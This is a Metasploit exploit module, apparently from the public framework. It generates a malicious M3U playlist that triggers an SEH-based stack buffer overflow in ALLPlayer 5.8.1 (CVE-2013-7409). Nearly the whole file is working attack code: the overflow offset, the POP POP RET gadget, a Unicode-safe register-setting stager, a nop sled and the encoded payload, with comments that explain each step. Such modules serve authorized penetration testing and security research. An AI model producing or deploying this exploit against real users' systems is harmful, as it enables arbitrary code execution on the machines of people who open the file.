##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
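class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata.
  #
  # This is a client-side file-format exploit: the module only writes a
  # malicious .M3U playlist to disk (FILENAME); nothing is sent over the
  # network and the victim has to open the file in ALLPlayer. The single
  # target carries everything version-specific (filler offset, handler
  # gadget, Unicode-safe nop byte) so `exploit` stays free of magic numbers
  # and a second build of the player could be added as another target.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ALLPlayer M3U Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in
          ALLPlayer 5.8.1, caused by a long string in a playlist entry.
          By persuading the victim to open a specially-crafted .M3U file, a
          remote attacker could execute arbitrary code on the system or cause
          the application to crash. This module has been tested successfully on
          Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'metacom', # Vulnerability discovery
          'Mike Czumak', # Original exploit
          'Gabor Seljan' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-7409' ],
          [ 'BID', '62926' ],
          [ 'BID', '63896' ],
          [ 'EDB', '28855' ],
          [ 'EDB', '29549' ],
          [ 'EDB', '29798' ],
          [ 'EDB', '32041' ],
          [ 'OSVDB', '98283' ],
          [ 'URL', 'http://www.allplayer.org/' ]
        ],
        'DefaultOptions' => {
          # Exit only the hijacked thread rather than the whole process, so
          # the player does not die under the victim when the payload ends.
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          # The stager in `exploit` places its own nop sled; the framework
          # must not prepend generic nops that are not Unicode-safe.
          'DisableNops' => true,
          # NUL/LF/CR would end the playlist entry early. The 0x80-0x9f bytes
          # listed here are presumably the ones the player's Unicode widening
          # does not map 1:1 to <byte,0x00> -- confirm before editing the list.
          'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
          # Upper bound on the encoded payload; the trailing filler written by
          # `exploit` is appended after it regardless of the actual size.
          'Space' => 3060,
          # The vulnerable code widens the entry to UTF-16, so the payload is
          # encoded with the alphanumeric Unicode encoder. Its decoder stub
          # needs a register pointing at the payload start; the stager in
          # `exploit` derives EAX (= EBX + 0x100) for that purpose.
          'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' => {
            'BufferRegister' => 'EAX'
          }
        },
        'Targets' => [
          [
            # Version label follows the description and CVE-2013-7409 (5.8.1);
            # the previous label read "2.8.1" (with a stray leading space),
            # which did not match any referenced advisory.
            'ALLPlayer 5.8.1 / Windows 7 SP1',
            {
              'Offset' => 301, # filler bytes before the exception handler record
              'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe (0x00450050 once widened)
              'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-10-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
      ]
    )
  end

  # Build the malicious playlist entry and write it to FILENAME.
  #
  # Every byte below is laid out for the buffer as it looks *after* the
  # player widens it to UTF-16 (<byte,0x00>); the opcode comments describe
  # the instructions as they decode in that widened form, which is why a
  # three-byte write such as "\x05\x14\x11" reads as a six-byte ADD. This
  # looks like an SEH overwrite (POP POP RET handler gadget plus a large
  # trailing filler whose only job is to raise the exception):
  #
  #   filler (Offset bytes)      reaches the handler record
  #   "\x61\x50"                 next-handler slot, executed first (POPAD ...)
  #   target.ret                 handler pointer -> POP POP RET in ALLPlayer.exe
  #   stager                     EAX = EBX + 0x100 ; PUSH EAX ; RET
  #   nop sled + payload         decoder stub expects EAX at the payload
  #   filler (10000 bytes)       triggers the exception
  #
  # A `nop` byte sits between the single-byte stager opcodes: its widened
  # form (00 6e 00) decodes as ADD BYTE PTR DS:[ESI],CH, consuming the
  # interleaved NUL without touching EAX.
  def exploit
    nop = target['Nop']

    sploit = rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50" # POPAD
    sploit << target.ret
    sploit << "\x53" # PUSH EBX
    sploit << nop
    sploit << "\x58" # POP EAX
    sploit << nop
    sploit << "\x05\x14\x11" # ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11" # SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50" # PUSH EAX
    sploit << nop
    sploit << "\xc3" # RET
    sploit << nop * 109 # Unicode-safe sled the stager's RET lands in
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file; the overflowing string is a single "http://" entry.
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)
  end
end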